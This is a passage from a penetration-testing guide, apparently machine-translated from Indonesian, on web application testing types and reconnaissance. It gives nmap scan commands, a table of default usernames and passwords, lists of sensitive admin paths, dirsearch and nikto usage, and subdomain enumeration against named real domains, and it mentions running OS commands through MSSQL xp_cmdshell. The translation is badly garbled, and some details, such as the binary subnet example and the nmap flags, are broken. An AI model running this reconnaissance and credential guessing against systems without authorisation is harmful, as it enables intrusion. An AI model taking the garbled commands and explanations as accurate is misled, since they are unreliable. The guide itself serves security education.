one of his essays: "Airbnb offers more rooms than the biggest worldwide hotel chains and yet owns no
property. " Yes, Airbnb offers more rooms (rooms) compared with hotel chains
largest available. And teruniknya is Airbnb not have property. In other words,
property belonging to users who became the "thing" to be offered.
With the increasing number of business lines are too many to accommodate his or her user data
detailed and massive, certainly can not be more inevitable will be the emergence of various problems
security information that may cause harm in the form of material and reputation.
Based on the independent report entitled " 2018 Data Breach Investigation Report " Verizon
states that personal data is the data that is most often stolen when the occurrence of an
breach of a variety of industries (with the number of cases reached 730 cases per year), which is then
followed by the payment information (the number of 562 cases per year), medical data (505 cases
per year), and credentials of each user (about 154 cases per year).
As a note, each case would have a massive data leak and
vary from thousands to millions.

Weather | 2
Figure 1 Top Data Compromised Varieties
As in practice, the same report also stated that the perpetrators of
the occurrence of this breach may be composed of various groups such as external parties, engagement parties
internal, as well as a partner.
Figure 2 Actors and Motives in Breaches
By looking at the data that has been presented from Verizon as well as other independent reports
Similarly, of course, the whole this is considered "may" be a trigger for each offender movement line
attempt to optimize data security can be a change in the process,
technology implementation, or to seek testing services.
In its implementation, testing in the context of this security itself can be interpreted by
quite varied, which is like a closed trial services such as formal security testing (either penetration

Weather | 3
testing, security assessment, or the red team), to the open test services such as the
procurement of responsible disclosure program (either with or without reward).
In the reality, unfortunately there is a condition unfavorable to answer
the needs of existing industry lines. Presented by ISACA on "State of Cybersecurity 2019" as
quoted by BusinessWire 32% of the correspondent states that it takes about 6 months or more
to fill cybersecurity-related work in their organizations. In other words, power in the realm
cybersecurity still somewhat inadequate existing market conditions.
Viewed from the existing situations, the author must author hopes that this guide was
may be one means to colleagues who want to learn a good test model for
closed testing (formal security testing), and especially those for open testing (such as
responsible disclosure and good programs without any reward).
1.2. Scope
As noted earlier, the scope of the discussion in this Guide
focused on the activities of the security test against a web-based application.
For brief information, in a formal testing activities (such as Penetration Test, Security
Assessment and otherwise), the application of the concept of testing is certainly advisable to
carried end-to-end from both internal and external regions, each of which in
it includes the realm of black box, gray box and white box.
As in the bug hunting activities, of course, the testers have to follow any rules
given by the owner of the program, both the scope and type of vulnerabilities that can
accepted (which is of course on the basis of risk of each).

Weather | 4
2. CORNER VIEW SECURITY TESTING
Preparation of this manual was adopted from some references that are recognized internationally
also be combined with a variety of experience of the author. As for the implementation, some
adopted references include some of the following:
Figure 3 Best Practices / Frameworks
In the existing implementation, each test activities should also be equipped with a viewpoint
testing detailing both external and internal area area which is divided into three, namely
Black Box, Gray Box and White Box.
Figure 4 End-to-End Security Testing Point of View

Weather | 5
In meaning, the viewing angle is has several meanings such as:
• Black Box : Meaning that a test is carried out in a situation of an examiner
do not have an account to enter into the application or not have access into a
network or asset tested other than those owned by a visitor (such as applications)
or guests in general.
• Gray Box : Meaning that a test is carried out with a testing situation already
have little access not obtained the visitors in general. As an example of
when a visitor has access as a user (customer / client).
• White Box : Meaning that a test is carried out with the highest access in each
each region. As an example of such test from the standpoint of the server administrator
(With administrator privileges), the viewpoint of application administrators (with permissions
such as super administrator), and the viewpoint of the database administrator (with the right of entry
into the database). Inti simple it is, make sure that each layer can not enter
layer to another without any purpose that is poured properly according to regulations.
With various references are coupled with various viewpoints test (both external
or internal), then this guide is also expected to be increasingly in the destination
to optimize the identification of a risk.
Figure 5 Threat Source and Motivation

Weather | 6
As for implementation, no denying that there is considerable confusion
significant in the determination of a particular type of security testing of related activities that have a test pattern and
times vary. As a simple note, a few simple things that are generally used
to determine the use of the types of activities that exist are located on the side of security maturity
which is owned by a company and the company's needs in identifying a risk
contained therein.
Figure 6 Types of Tests
Broadly speaking, there are three types of technical activities is quite known among pegiatan
security information, namely Vulnerability Assessment, Penetration Test, and Security Assessment.
2.1. Vulnerability Assessment
based on explanation of Akamai and many other competent source in it, in
Specifically, Vulnerability Assessment is an activity that has the characteristics of trials related
linked to the use of an automation vulnerability scanner. In it, the testers will
trying to perform validation on each result submitted and providing follow-up
to issue a valid recommendation.
Figure 7 Vulnerability Assessment I - Pic. from Akamai

Weather | 7
Figure 8 Vulnerability Assessment II - Pic. from Akamai
However, this test activities can not be the primary gauge because it is considered less
identifying a maximum risk. In addition to dwell in the realm of signature owned by
each automation vulnerability scanner, this activity is also considered to be less able to test the groove
(Flow) of a business is usually stated in the application implementation.
Based on these considerations, then that many are referring to the activities of a test on it,
namely Penetration Test.
2.2. penetration Test
In contrast to the vulnerability assessment, penetration test activities are more likely to have
a specific purpose, such as whether or not a target of foreclosed.
This activity does not necessarily glued to the results of a vulnerability scanner automation or
on a check-list. In a way, this test activity will try to simulate a variety of
types of attacks that are commonly used to enter into a system.
When its application, the examiner will be able to utilize more than one type of vulnerability
(Which may be a simple incorporation of multiple vulnerabilities) to achieve one goal
The main, which takes over the targeted system.
However, this test activity ultimately can not be 100% is considered the main reference
When a company / organization wanted to see a risk there is in him. based on their
These deeper needs, then finally counterposed a risk-based test model
which is generally known as the Security Assessment.

Weather | 8
2.3. Security Assessment
Concept promoted by the Security Assessment is quite simple, namely:
• When a system has been said to be at risk, then it is likely that the system has a
vulnerability (albeit with a low level though). However, vulnerable does not mean
can make a tester to enter into the system.
• When a tester has been successfully entered into the system, it can be ascertained that
system is indeed vulnerable (though possibly in need merger application
some kind of vulnerability). However, entry into the system not mean to say
that a tester has been successfully demonstrated a risk (especially on businesses).
Because there is a possibility when the system has been penetrated was already no longer in use.
And it needs to be noted that the risks are discussed in this topic relates to three
The main components of information security, namely confidentiality, authenticity, and availability.
In a security assessment, an examiner will try to maximize a test
from various points of view to be able to identify potential risks that may arise.
Some simple examples that are often discussed to clarify this case is related to
the circulation of photographs of artists who use Apple's iCloud service around 2014 ago.
Many say that at that time Apple has been compromised, however, Apple is not
never compromised for the situation. In fact, the attacker is actually take advantage
Apple vulnerabilities that have not restrict login attempt (limitation of login attempt) against the service
iCloud, allowing an attacker to perform a brute force (password)
as much as possible to a valid username.
Examination of idle session termination, setting history of a change of the password,
password age setting, and similar to this, everything is a few points
generally considered in the Security Assessment.
On the other hand, when a tester has been successfully entered into the system, then the examiner must
examine every possibility that could pose another risk potential in it, such as
check out the possibility of storage in the browser's password, the storage of sensitive documents,
still unreadable in plaintext would be the configuration of the database connection string, and others.
The common thread is, a tester must ensure that the data (which is not intended
by the manager of the database - such as database administrators) are stored in the database
even if it is not allowed to be read without being protected by a database administrator.

Weather | 9
2.4. Bug Hunting (Responsible Disclosure / Bug Bounty Program / etc)
Should be noted that although the activity of "Bug Hunting" also basically done on
security testing activities outlined above, however, the "Bug Hunting" in this context
will be pursed in activities seeking security bugs in open programs such as responsible
disclosure and bug bounty program.
In the context of the implementation, such a program would be less appropriate / optimal for release or
used as a major benchmark in order to identify a risk that an application / system
have never passed the safety test phase before. In other words, this program will
fairly effective if an application / system has been "considered" safe (for passing the test phase)
so hopefully no longer find common vulnerabilities that can lead to
risk.
As for some of the reasons include:
• Too risky to release an application / system while the application / system itself is built
on the basis of ignorance of the concept of security. Keep in mind that discipline 'science between
developers to testers in general there had to be a difference. If the difference is not
combined into one in a process of development, it can be ascertained
that the existing security-related risks will be greater.
In summary, the release anything without making sure first internally and "surrender
directly on outside parties freely ", is the same as a danger to themselves.
• On the other hand, is essentially an examiner who is active in a variety of responsible disclosure program
enough "only" found one bug to achieve their objectives, namely in the form of satisfaction
of its own because it has successfully helped a company, or to achieve such a thing
acknowledgment and / or reward. Although in practice a tester also
still be able to incorporate some kind of bug that is obtained from a variety of assets to be
reach a higher risk, however this is not including what is regarded
often found in reality. Areas of focus testers sometimes be the primary concern of
the testers give the impression that there is a "limit" to optimize testing.
• And the other reason is because testers involved in bug hunting program is not
have the "pressure" to perform optimally and thorough test, so the test will be
can be carried out in accordance with his will (with time and targets are also uncertain).
In other words, of course, the owner of the application / system can not "surrender completely" on
experts context by way of working in this way.

Weather | 10
Imagine if the time of release, it turns out there is no bug hunter or researchers who are testing
This application or interested in / have the time to test. Surely this will cause
"Gap" of its own
Unfortunately in practice in the field, in fact there are some tendencies of the owner application
which makes responsible disclosure / bug bounty program as the main act in
see vulnerability or risk ( not make it as a complementary action). even though
on the side of practice is applied, it is a lot of companies out who had fortify first
advance himself before finally "disconnecting" to the side of the open testing program.
Note: fortify here generally can be either internal testing, increase security
perimeter, strengthening the policies contained in it, or other things.
Is there a clear example in this regard? Yes, the one that can be used as an example of a bug bounty
Google's program. When they acquired a company, then they declare
that they would take up to six (6) months before the company
The acquisition will be entered into the "in-scope" bounty. Following little excerpt sentence issued
on the official portal :
" Although the reports Often deal with real vulnerabilities, we pragmatically Decided to establish a six-
month blackout period for any newly Google Announced acquisitions before they can qualify for a
reward. "
What do you mean simple? Some argue that Google wanted to ensure that
This newly acquired firms have safety standards that have been implemented by Google
before finally (maybe) moved to Google's internal and eventually left
openly tested.
Regardless of the opinions expressed, the common thread that can be achieved from this
is "sure has gone through a process of internal testing at first and then released to the outside".

Weather | 11
3. APPROACH GUIDE
Specifically, this guide is made to approach the general overview
The following vulnerabilities with functions that are generally available to a web-based application. Although
Thus, in its implementation, testing is commonly done effectively and efficiently to
This web-based application is done by not limited in its application, but also
infrastructure and databases used. Some figures in outline contained in
The following chart:
Figure 9 Web Application Security Assessment
In this situation, the outline of it is done as follows:
1. information Gathering
This section is a stage activities focused on searching information
which focused on a few major things like Network Mapping, Port Scanning, Web Crawling,
etc. The purpose of this activity is to:
• Knowing the relationship between a system with other systems,
• Know which ports are "left" open within a system,
• Knowing platform / engine used in the following applications with checks
against multiple directories or files senstif "open" to the public.
2. Access Testing
A testing process that places the emphasis on the individual's access rights to a

Weather | 12
good application of the process of authentication and authorization.
3. Session Management Testing
A testing activities that aim to ensure that an application has been
have a good control in organizing a session that is generated by the user. this examination
can be an examination of cookies, tokens, or predict the flow of the session.
4. Data Validation Testing
This section is part of testing was focused on the things that are injection.
SQL Injection, Cross Site Scripting (XSS) and OS Command Injection are some examples
tests performed in this section.
5. Logic Testing
Every existing applications, business processes must be made with different though
There are models of the same functionality. And there is no doubt that the impact of the utilization
application logic errors from the business side is very large.
In the implementation, this activity is done without the use of scanning tools that are
automatic. This is because the assessor will conduct testing by utilizing intuition
which in this case will look at all requests and responses sent to either of the client
or server.
6. Miscellaneous Check
In this section, the testing activities carried out on all the things that become supporters
course of an application. As for the supporters in question are such as servers (application hosting),
database, digital certificate, or other things.

Weather | 13
4. TEST SUMMARY BASIS
Before going further into the discussion voyeur, then this section will be discussed first
on the basis of test steps that are generally performed when dealing with the target.
In assessing a system (whether it's an operating system and applications such as Web and
others), of course, an examiner can not be separated from the so-called information gathering.
It is generally useful to know the "state of" active and visible at a
system. For example, for the operating system, then we will be able to know the service (service)
up on the operating system in question.
As a first step on the stage of information gathering for the operating system, generally
testers can dwell on a simple tool called nmap to "show"
regarding the service (service) enabled.
Here are a few common commands that are used to view the service (service) is active
the operating system by using nmap:
• # nmap -sV ip_target - as an example: # nmap -sV 10.75.100.170 ( it is used to look
The following active TCP services which version is used);
• # -St nmap ip_target - as an example: # -St nmap 10.75.100.170 ( it is used to look
active TCP services);
• # nmap -sU ip_target - as an example: # nmap -sU 10.75.100.170 ( it is used to look
UDP active service);
• # nmap -A ip_target - as an example: # nmap -A 10.75.100.170 ( it is used to look
overall information contained on the following target with some brute force trial
with build-in dictionary belonging to nmap).
But when an IP has not been obtained, then the tester can use the command # nmap -
sP IP_segment, as an example of # nmap -sP 10.75.100.0/24.
Note:
10.75.100.0 is a segment (commonly called network-ID) on 10.75.100.0
The value of 24 in the above command is a Subnet Mask value on the relevant segment
coming from 255.255.255.0
Segment calculation formula is:

Weather | 14
ip_address AND (logical operator AND) subnet mask.
For example, there is the IP address 10.75.100.170 with subnet mask of 255.255.255.0, then the segment is:
10.75.100.170 AND 255.255.255.0:
10.75.100.170 → 00001010. 01,001,011. 01.1001 million. 10101010
255.255.255.0 → 11111111. 11111111. 11111111. 00000000
________________________________________________________ AND
10.75.100.170 → 00001010. 01,001,011. 01.1001 million. 00000000
Thus, IP 10.75.100.170/24 lies in the segment 10.75.100.0
Subnet value to 24 because there are twenty-four (24) the number one (1) on the subnet mask
there is.
For a quick test, generally testers can start by searching based operating system
Microsoft Windows first. However, this does not mean that Windows is a system
Operating vulnerable, but because of the convenience provided and so many configurations
that needs to be done so as to make these operating systems have vulnerabilities of some doors.
Thereafter, this test can is specified in two grooves in general, namely:
1. Finding public service which requires "precision" of man.
Specifically, when did a quick test, the tester can try to find service
general requires "precision" man in the configuration. It generally ranges
to some services such as FTP, SSH, Telnet, MySQL, MSSQL, Tomcat, Coldfusion, PHPMYADMIN,
Cpanel, and similar to this. The main reason is because the targeting service
These services have "access" to communicate directly with the operating system (such as
put a file and the like). For example, an attacker could exploit
access to MSSQL to run the operating system command through xp_cmdshell feature.
2. To test the basic concept is based on three main components.
Broadly speaking, the rapid testing of an operating system or device on the network,
rotating on three major components of the test, which is about the mechanism account (account and password),
about patching (version fairly obsolete / outdated), as well as about the configuration.
As a simple example, we take about FTP. In this situation, the three components in question
can be connected to the FTP as:
• The use of the account and password in the FTP (weak or absence of the combination used);

Weather | 15
• The configuration settings of such anonymous FTP access (can be accessed without the need
a valid account); and
• The application of the patch to the version that somewhat obsolete / outdated.
When one of these three components can be bothered, then certainly there will be a component
impaired information security (either to enter illegal data access, as well as
in context to negate the availability of the data). The details are as
following:
2.1. Tests on the account and password are used.
Account and password is one of the main door which can be met by an examiner
(Or attacker in a real scenario) well when faced with an application that is generally
client-server (web, mobile, or desktop).
Has become a reality that is hard to be denied when there are still many developers / maintainers
a system that still uses the account and password that are weak. The reason
quite varied, such as:
• The tight release schedule (thus using the account and password is weak to
easy management prior to release). Generally, the manager in question will not
accidentally forgot to replace it when an asset has been released (into the
production). On the other hand, there is the presence of the control to not use all of the dummy
Data on the development became one of the factors that ultimately separate "support" issue
This emerged.
• The different disciplines' knowledge between developers / managers to testers. It is also commonplace
found because the mindset formed from each area were quite different.
Generally, the "support" in the form of a lack of security awareness can also lead to
developers / maintainers are not aware of the risks that can happen to him when he was
using your account or password is weak.
With the provision of the use of vulnerability at this point, the tester also has a step more
close to be able to fit into an overall system.
In the reality, the development of workflow / attack scenario can be connected to the side:
• Web-based applications: such as gender issues related to the File Upload, SQL Injection (when logged in) to
associated with the reading of sensitive files (when the use of databases in a mode that

Weather | 16
can read files in the internal), as well as other similar terms that allow reading
or communication with the data contained in the operating system.
• Desktop-based applications: in this situation, can we kerucutkan into services
commonly found as outlined above. The subsequent scenario
may like to read sensitive files (via SSH / FTP / like) that can be used
to go into other assets contained in the system.
The account and password combination that is commonly used is like:
No. usernames passwords
All contained in a username into

1. adm
password
2. admin <Blank password> / without password
3. admin P @ ssw0rd (with P large and small)
4. administrator P4ssw0rd (with P large and small)
5. 4dm1n Passw0rd (with P large and small)
6. 4dm1n1str4t0r Qwerty (with Q large and small)
7. root 1qazxsw2 / zaq12wsx
8. sa 12345 (and combinations until the number 0)
As well as the associated default password

ness is enforced / nama_jalan /
with the name of a specific product, such as:
9. app_name / nama_departemen /
https://cirt.net/passwords
nama_pic
http://www.phenoelit.org/dpl/dpl.html
2.2. Tests on the unapplied patch (version obsolete / outdated).
As a quick note before going further into the discussion at this point, this 2nd condition can
executed, either after an examiner has gained access to internal applications / systems
operation (with the use of the use of the account and the password is weak) or not (without
login).
At this stage, the examiner is required to map out a version of every thing
used by the asset to be tested, such as operating system version, version of the CMS /

Weather | 17
Framework of a web-based application, or a version of a desktop-based application that is used
(Eg FTP Server, SSH, and others).
From a situation that has been described, it can be seen that the test at this stage yet
touched the side the logic of each application, but more likely on the side
exploit a vulnerable version spelled exploitation code has been released in public
area. For example, testers found a PHP File Manager application known to be at
version 0.9.8. On this occasion, the testers must find out first will be vulnerability
which may have been released by a researcher associated with the applications referred to later
used to enter into the system.
Important note that because the ultimate goal is to get into the system,
then search this vulnerability is limited to that are connected to the server-side, not
to client-side such as Cross Site Scripting and the like.
2.3. Tests on configuration errors that have been applied.
Unlike the two components noted earlier, in this component, then
an examiner is expected to know the general configuration of a service that is active on
assets to be tested.
For example in the FTP service. Inside these services, it is known that there are configurations
allows one to gain access to the services in question without the use of
password (the user anonymous status) that some are able to
have permission "to write". On this occasion, a tester are required to test
the possibility of asset owners whether or not to enable the configuration (anonymous access) in question.
3. Search the directory or path sensitive that can act as a dashboard.
At this stage, the testers are expected to be able to search for information about the path and directory
sensitive that may be contained in the assets to be tested. Of course, in reality, it is
seemed more applicable if you want to "deal" with a web-based application.
Why is it necessary to know this? Because in general, directory or path
serve as a liaison to the dashboard regulating these applications have sufficient access
many of the internals of an operating system, as an example of such uploading features, feature
CRUD (which is usually connected to the database directly), and others. With
obtain the features mentioned, the potential to gain access to the system became
the higher it is.

Weather | 18
3.1. Search through the robots.txt
In the implementation, general directory searches can be done by visiting the file
robots.txt commonly contained in an application.
Specifically, the robots.txt file is basically a file which aims to provide
regulations against "bot - search engine" for not crawling toward directory
specified therein. However, from the viewpoint of the attacker, it is becoming a
short door to be able to know the location of sensitive directory is located.
For example, an application has a directory / path on http://aplikasi.com/J4ng4nAks3s ,
However, because the path "J4ng4nAks3s" was placed on robots.txt, it will not
straight, an attacker would be able to know where the directory / path in question.
3.2. Search the directory common use.
On the other hand, the tester can try to find out the existence of a page
using the method of guessing sensitive to the common good as well as the
recorded in the general dictionary.
Typically, this spin on the side:
/ adm / cpanel / manage
/ admin / dashboard / Manager / html
/administrator / root / pma
/ 4dm1n / backend / phpMyAdmin
/ cms /login And others
Does it need to type everything one by one? The answer is certainly not. There is an application
which can be used to help a tester in the search for a directory / path or
even sensitive files quickly, such as dirsearch (can be visited at the following link:
https://github.com/maurosoria/dirsearch ). As for implementation, it will be
effective when adding the extension type that want to look for, as an example of the command:
python3 dirsearch.py -e -u target.com .asp, .aspx, .jsp, .php, .csv, .doc, .docx, .xls, .xlsx, .ppt, .pptx,
, pdf, .bak, .conf, .config, .old, .sql, .jar, .rar, .zip, .tar, .tar.gz, .apk, Ipa, .cgi, .do, .htm,. html, js,
, json, .rb, .xml, .yml, .svn, .git

Weather | 19
4.1. Conclusions The use of Method Test Summary Basis
Armed with three grooves intended (ie to "seek public service that requires
human accuracy ", with" test with the basic concept is based on three main components ", and
with "sensitive search the directory or path that can act as a dashboard"), then
indirectly, the testers are expected to accelerate the testing time to achieve
the larger main goal, which is to take over an asset that has a lot of relationships
with other assets, such as Active Directory.
After such a successful asset taken over, the examiners will be able to analyze asset
the other in a relatively shorter (one of which is "no longer need to meet
process access requests are sometimes less likely to be given when on the ground ").

Weather | 20
5. RECONNAISSANCE
In the reality, for an examiner to determine whether there is an application-based
web somewhere, of course, it takes one of the two following information, namely domain name
and the IP address of the target.
1. When you do not know the domain name, it will be difficult to determine the targets to be tested,
especially if the company name is general. A simple example: "Let me help you test
ABC's app ". Obviously this will cause confusion, between trademark ABC
in Indonesia or other ABC that the domain naming may be different, for example, abc.com,
abc.net, and more. On the other hand, often the domain name is not related at all with
the company name. Examples such as PT Swordsman Smart whose domain is
https://www.halaman-tertentu.com/ , of course unlikely that we seek
http://pendekarpintar.com/ ,
From this conclusion it can be seen that it would be better if the testers know the domain name
which is to be tested.
2. If the domain name is not known, then at least to know the IP testers who want to be tested. And
when his IP is known, then of course testers should re-do the initial stage, ie
do Port Scanning. As for the results of Port Scanning, then simply aimed at output
TCP has HTTP or HTTPS protocol which is a protocol that is commonly used
for an application to communicate.
The question is, whether it will be that easy, by knowing the IP
know the application? The answer is unfortunately no. Because there are situations when an IP has
many applications so we need the information in the form of "path" of the application. Example:
• Applications abc.com is located at IP http://10.20.30.40/abc
• Xyz.com application lies in IP http://10.20.30.40/xyz
Nevertheless, in spite of the steps required to search for a domain name and path
there (which of course will be covered in this guide), two related information to know the name
domain name or IP, of course, already become one of the doors opening for testers to know
whether there is an application in it.
As a reminder back, when it encounters an IP and wanted to know the services / service
maybe up in the IP in question, then the tester can perform port / service scanning with tools
aids such as nmap as has been noted in the "Summary of Basic Test".

Weather | 21
5.1. Finding Sub-Domain of One Target
5.1.1. Reverse IP Lookup Method (Use of the Same Server)
Generally when an examiner has found that the main domain of one target, of course it
This can simplify the steps to perform testing of the web application itself.
However, the main domain is often not a target "good" to be attacked since
beginning (of course, this statement is issued by the exception).
Then why the primary domain is not a good target to be attacked from the start?
Simply put, when the main domain being the target is the property of something
companies / large organizations (let alone to open a bug bounty program), then it can be
ascertained that there are so many individuals who test which would be expected to
beriringnya monitoring activity of the perusahaa / organization as well as improvements to the serangan-
successful attack (affect risk).
On the other hand, the developer will always exert maximum effort to
make sure that the primary domain is secure, or even minimize the features available on the
The main domain so testers really would be difficult to "do something".
Note: Then why is there an exception to the statement delivered? For the author, the situation in
Indonesia is unique because it is often found that the main domain it is also vulnerable to
attacked so it can not be forgotten as "part of the test target" (except when the target is
company / organization has a policy that generally are required to perform security
testing of related regulations).
Now let's go back to the initial topic. Why need to find a sub-domain of the primary domain (although
objective may remain in the primary domain)? The reason is actually quite simple. In
in hacking activity, an attacker will never be the target partiality
addressed. As long as he can reach the main target, then a wide selection of test methods will
taken by itself, including attacks on sub-domains are available.
On the other hand, there is a unique culture at each company / organization (including big names though)
that is not necessarily the development of an application in a business unit would be similar to
The development of business unit B. Moreover if this new company to acquire
another company that would certainly have a different cultural development.
Then, what should be done in the search for a sub-domain?
Of course, quite a lot. The common thing ordinary writers do (when the main priority

Weather | 22
is "entered" the primary domain), then it can start to look for a sub-domain of IP
the same used by the primary domain. The purpose of this thing is done is because when a tester
can hack into sub-domains having the same IP with the primary domain and made it into
the operating system being used, then the examiner in question can be said to have been one step ahead
to get into the data on the primary domain.
For example, randomly, the authors take novell.com domain as the main target. In this situation,
the author will try to find another domain that might exist in the IP used by
novell.com.
As for the start, the necessary steps are quite simple. Testers can use
online tools with the keyword "Reverse IP Lookup". Some results of this search will be focused
on service " You Get Signal "And" HackerTarget ".
Figure 10 Reverse IP Lookup with "You Get signal"
From the results, it will be seen that there is a sub-domain (outside the main domain) that
settled in the related IP. Because the sub-domains in question were in the use of the same IP
with novell.com, then there the possibility that "they" also are in one system
the same operation. In this context, lucky there are no other domains outside of belonging
novell.com (which generally can occur because it is on shared hosting).
Vital Records: One identical IP does not mean being in the same operating system. Then
Moreover, this is just one way to open the lines becomes more widespread testing to achieve the objective
towards the main target.

Weather | 23
5.1.2. Sub-Domain Enumeration with Automation Tools
Often, a tester needs a list of sub-domains owned by a domain for
then can be used as a target in the hacking. The reason is quite simple, because testers
will always try to look for the possibility that one of the sub-domain this hacked
linked to the main domain.
A simple example which can be raised that such success stories bypass protection
CAPTCHA on the main portal asus.com due to the discovery of one of the "direct access" to the
registration and login section in one of their mobile applications that can be downloaded through
PlayStore. This story is indirectly also recalled that "culture" development
in one business unit to another will be different, especially if there is no control
organize or perhaps because of their activity "bypass" of the regulations that have been applied.
As a preliminary, it should be noted that the sub-domain search method is generally
is always associated with a dictionary combined with the various search engines. Example
simply that there is a sub-domain called asdasd.target.com. When "asdasd" This does not make
to the keywords in a dictionary and is not well detected by any search engines, then
it is certain that this sub-domain can not be found (unless it has been notified by the owner).
Note: one dictionary that quite a lot and continuously updated namely artificial Jason Haddix to
seen in the link: https://gist.github.com/jhaddix/f64c97d0863a78454e44c2f7119c2a6a ,
For fast-know list of sub-domains that exist in a targeted (without
open notebook - such as a quick test of the smartphone), usually testers can
using VirusTotal.com services. In addition to functioning as a platform used for
detect malware in a file or link, Virustotal can also be used to
see sub-domains contained within a primary domain. Its use is quite
simple, testers only need to sign in to the portal: https://www.virustotal.com/#/home/search that
then proceed by entering the expected link.
Figure 11 Sub-Domain Search page on VirusTotal

Weather | 24
On this occasion, will be back to try to include a link to it can be seen novell.com
information in the form of sub-domains are detected.
Figure 12 Found 100+ Sub-domains
When a domain belonging to novell.com inserted, it will automatically detect the service sub-
domains that have become part of a database owned by VirusTotal.
Should be noted that in addition to enumerating the sub-domain of the primary domain, this service also
capable of performing detection of a sub-domain of other sites that "allegedly" having links
(Named siblings) with domains that are input. Nevertheless, the results are displayed on the
"Siblings" is somewhat less than the maximum in existing detection because of its limited expectations.

Weather | 25
Here's a little glimpse of the results of enumeration in question:
Figure 13 Example Simple Enumeration Results
Now if you want to test the depth (no longer just viewed from VirusTotal), then
some other tools that are commonly used and quite powerful about this is:
• Sublist3r - https://github.com/aboul3la/Sublist3r
Very fast but do not make this tool as the only choice. generally sublist3r
only used as an opener just so the search process can be done quickly.
However, to obtain a sub-domain information in detail, it is recommended to
choose other tools.
• amass - https://github.com/caffix/amass
Good because it can be combined using various engines such as Shodan, Censys,
VirusTotal, and others (through the use of the API of each service) so that the acquisition
information will be more optimal.
The method used was composed of crawling the web archives, permuting / altering names, and
DNS reverse sweeping. The positive thing is these tools continue to be updated until March 11, 2019
ago and has become part of the OWASP project ( https://github.com/OWASP/Amass ).

Weather | 26
• Subfinder - https://github.com/subfinder/subfinder
Approximately the same as amass which has been combined with the use of a variety of engines.
It is advisable to use both (both amass and Subfinder).
Based on the research that has been conducted and presented by Jason Haddix on " bug Hunter
Methodology v3 ", the following is table comparison of the use of tools which exists:
Figure 14 Table Comparison of Sub-Domain Enumeration Tools
And here is a little picture of the results of the use of sub-domains enumeration
tools to link belongs bitdefender.com:
Figure 15 Few of the Sub-Domains at bitdefender.com

Weather | 27
5.2. Seeing the state of the Target Sub-Domains
5.2.1. Directory / File Brute Force
A search for information about a targeted not complete unless accompanied by a step
identify possible directories that exist on the intended target.
Why is it necessary to know this? As noted in the summary of the basic test,
because in general, the directory or path that acts as an intermediary on the dashboard
This application regulators have considerable access to the internals of an operating system,
as an example of such a feature uploaded, features CRUD (which is usually connected to the database
directly), and others. By acquiring the features mentioned, the potential to achieve
Access to the system is even higher.
To make this guide can be viewed sequentially, it will be discussed again with the
some of the additional steps needed in this regard.
1. Search through robots.txt
The first thing to do is of course viewed robots.txt.
Specifically, the robots.txt file is basically a file which aims to provide
regulations against "bot - search engine" for not crawling toward directory
specified therein. However, from the viewpoint of the attacker, it is becoming a
short door to be able to know the location of sensitive directory is located.
For example, an application has a directory / path on http://aplikasi.com/J4ng4nAks3s , however
Thus, because the path "J4ng4nAks3s" was placed on robots.txt, then indirectly,
an attacker would be able to know where the directory / path in question.
2. Automation Directory / File Brute Force
On the other hand, the testers can try to find out the existence of a sensitive page
by using the method of guessing to the common good as well as that recorded in
general dictionary.
Typically, this spin on the side:
/ adm / cpanel / manage
/ admin / dashboard / Manager / html

Weather | 28
/administrator / root / pma
/ 4dm1n / backend / phpMyAdmin
/ cms /login And others
In the implementation, a tester can use a variety of automation tools
can be used to help an examiner in the search for a directory / path or even file
rapid sensitive, such as dirsearch (can be visited at following link:
https://github.com/maurosoria/dirsearch ). As for implementation, it will be more effective
when adding extension types who want to look for, as an example of the command:
python3 dirsearch.py -e -u target.com .asp, .aspx, .jsp, .php, .csv, .doc, .docx, .xls, .xlsx, .ppt, .pptx,
, pdf, .bak, .conf, .config, .old, .sql, .jar, .rar, .zip, .tar, .tar.gz, .apk, Ipa, .cgi, .do, .htm,. html, js,
, json, .rb, .xml, .yml, .svn, .git
Should be noted that the execution of these tools recommended to be done several times each
managed to find a particular directory.
A simple example, a tester wants to find the possibility of directories / files that may exist
on the links http://10.20.30.40/ , When using this tool, the tool will automatically
perform a brute-force based on a built-in dictionary owned. Let's just say this tool to find things
following:
Figure 16 Scanning is Completed
Afterwards, the examiner must be repeated to execute the scanner in the directory / fire
were found. On this occasion, there will be potential when the scanner is going
managed to find a sensitive file in it such as .git or .svn.

Weather | 29
5.2.2. Directory / File Brute Force Part II - Web Crawling
Still with the same topic, but with the use of different tools, one of the tools that
also quite powerful to see the state of a domain / sub-domain (in the context of
know the file or directory) other than dirsearch is nikto ( https://github.com/sullo/nikto ).
By default, nikto has been installed in the Kali Linux and can be called directly without having to sign in
to a specific directory. And specifically, Nikto is used to find a path or directory
which can be accessed by the public. With many database owned, it will be more
make these tools the better.
In the implementation, the resulting output is somewhat a bit longer because nikto will
crawling first. However, it is recommended to use a fixed pengujia
This variant in addition to relying on just one type of automation scanner.
How to use itself is quite simple. Testers only need to enter the command:
# nikto -h target.com or # nikto -h sub-domain.target.com
To scan HTTPS side, then simply add the -p option 443 (if HTTPS in the default path, which is in port
443). Should be noted that the web crawling has a different context to the directory
brute force. On the web crawling, he will try to see every link and try to execute
each path is found (for viewing of sensitive content or potential issues that may arise).
5.3. Conclusion Basic Reconnaissance Phase
Of course, how to search for information as much as possible to the target is not limited to a
on matters presented in this guide. In reality, the way to do
information related to a search domain, shared hosting, as well as a directory or a file on
one target, will continue to grow and not stagnate on the issues discussed in this guide.
However, this guide alone can be the basis for the testers to look for an update
hit the target.
Going forward, this guide will discuss the common vulnerabilities that need to
can be further tested to minimize the risks inherent in a system.

Weather | 30
5.4. reference Reconnaissance
As supplementary information, the following are some references that could be a reference
Related discussions reconnaissance:
• Default Passwords: https://cirt.net/passwords
• Default Password List: http://www.phenoelit.org/dpl/dpl.html
• Reverse IP Lookup: https://www.yougetsignal.com/tools/web-sites-on-web-server/
• Fast subdomains enumeration tool for penetration testers:
https://github.com/aboul3la/Sublist3r
• Amass - In-depth and Network Mapping DNS Enumeration: https://github.com/caffix/amass
• Amass - In-depth and Network Mapping DNS Enumeration: https://github.com/OWASP/Amass
• Subfinder - subdomain discovery tool that discovers valid subdomains for websites:
https://github.com/subfinder/subfinder
• Open Source (GPL) web server scanner: https://github.com/sullo/nikto
• Bug Hunter Methodology v3 by Jason Haddix: https://docs.google.com/presentation/d/1R-
3eqlt31sL7_rj2f1_vGEqqb7hcx4vxX_L7E23lJVo / edit? Usp = sharing
• [Video] Bug Hunter Methodology v3 by Jason Haddix:
https://youtube.com/watch?v=Qw1nNPiH_Go

Weather | 31
6. SUB-DOMAIN takeover
Having previously described the ways in which it can be used in obtaining
